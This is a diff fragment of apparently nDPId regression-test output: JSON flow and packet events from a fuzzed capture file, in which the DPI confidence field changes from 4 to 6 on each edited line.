00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469555830,"flow_last_seen":1120469564839,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2713,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469572841,"flow_last_seen":1120469572842,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2714,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469572841,"flow_last_seen":1120469572842,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2714,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469573246,"flow_last_seen":1120469578248,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2715,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590256,"flow_last_seen":1120469590256,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2716,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635153,"flow_last_seen":1120469635153,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2721,"dst_port":58999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -202,52 +202,52 @@ 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469554654,"flow_last_seen":1120469554654,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2712,"dst_port":49973,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590257,"flow_last_seen":1120469590257,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":9587,"dst_port":156,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590257,"flow_last_seen":1120469590257,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":9587,"dst_port":156,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1120469572981,"flow_last_seen":1120469697469,"flow_idle_time":200000,"flow_min_l4_payload_len":346,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":2465,"flow_avg_l4_payload_len":493,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1120469572981,"flow_last_seen":1120469697469,"flow_idle_time":200000,"flow_min_l4_payload_len":346,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":2465,"flow_avg_l4_payload_len":493,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":133,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469828958,"flow_last_seen":1120469828958,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469828958,"l3_proto":"ip4","src_ip":"192.168.1.202","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1120469828958,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120469828958,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOah8AAIARTC7AqAHKwKgB\/wCJAIkAOluchP8BEAABAAAAAAAAIEVGRURFSkZQRUVFUEVOa0JFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="} -00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469828958,"flow_last_seen":1120469828958,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469828958,"l3_proto":"ip4","src_ip":"192.168.1.202","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469828958,"flow_last_seen":1120469828958,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469828958,"l3_proto":"ip4","src_ip":"192.168.1.202","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection 
failed","datalink":1,"packet_id":136,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120469830657} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":136,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120469828958,"pkt":"ADBPADRWAODtAW69CABFAI1IaiAAAIARTTHAqAECwKgBAQqsADUANM1AXNgBAAABAAABgAAABF9zaXAEX3VkcANzMnAJY3liZXJjaXR5AmRrAAAhAAE="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469831652,"flow_last_seen":1120469831652,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469831652,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2732,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1120469831652,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469831652,"pkt":"ADBUADRWAODtAXq9CABFAABISiEAAIARTTDAqAECwKgBAQqsADUANM1AXNgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 
-00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":137,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469831652,"flow_last_seen":1120469831652,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469831652,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2732,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":137,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469831652,"flow_last_seen":1120469831652,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469831652,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2732,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":138,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120469833655} 
00400{"packet_event_id":1,"packet_event_name":"packet","packet_id":138,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120469831652,"pkt":"MDBUADRWAODtAW69CABFAABIaiIAE4ARTS\/AqAECwKgBAQqsADUANM1AXNgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1120469835658,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469835658,"pkt":"ADBUADRWAODtAW69CABFAABIaiMAAIARTS7AqAECwKgBAQqsADUANM1AXNgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":140,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469633828,"flow_last_seen":1120469634840,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1120469835658,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":140,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469633828,"flow_last_seen":1120469634840,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1120469835658,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":140,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469632829,"flow_last_seen":1120469632829,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1120469835658,"l3_proto":"ip4","src_ip":"192.114.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":140,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469839664,"flow_last_seen":1120469839664,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469839664,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1120469839664,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469839664,"pkt":"ADBUADRWAODtAW69CABFAABIaiQAAIARTS3AqAECwKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":141,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847666,"flow_last_seen":1120469847666,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469847666,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.115.1","src_port":2733,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1120469847666,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120469847666,"pkt":"9jBUADRWAODtAW69CABFAABEaiUAAIARTTDAqAECwKhzAQqtADUAMFw5yNgAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycWEAAAwAAQ=="} -00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847666,"flow_last_seen":1120469847666,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469847666,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.115.1","src_port":2733,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arqa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847666,"flow_last_seen":1120469847666,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469847666,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.115.1","src_port":2733,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"1.0.0.127.in-addr.arqa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":142,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847667,"flow_last_seen":1120469847667,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120469847667,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1120469847667,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120469847667,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1Cq0ARz61yNiAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwmEb2NhbGhvc3QA"} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847667,"flow_last_seen":1120469847667,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120469847667,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847667,"flow_last_seen":1120469847667,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120469847667,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":143,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847669,"flow_last_seen":1120469847669,"flow_idle_time":620000,"flow_min_l4_payload_len":475,"flow_max_l4_payload_len":475,"flow_tot_l4_payload_len":475,"flow_avg_l4_payload_len":475,"midstream":0,"thread_ts_msec":1120469847669,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","l4_proto":120,"flow_datalink":1,"flow_max_packets":3} 01074{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1120469847669,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":509,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":509,"pkt_l4_len":475,"thread_ts_msec":1120469847669,"pkt":"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"} 
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":145,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847979,"flow_last_seen":1120469847979,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469847979,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1120469847979,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469847979,"pkt":"ADBUADRWAODtAW69CABFAABIaicAAIARTSrAqAECwKgBAQquADUANKw8fdoBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847979,"flow_last_seen":1120469847979,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469847979,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847979,"flow_last_seen":1120469847979,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469847979,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":146,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469848977,"flow_last_seen":1120469848977,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469848977,"l3_proto":"ip4","src_ip":"172.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 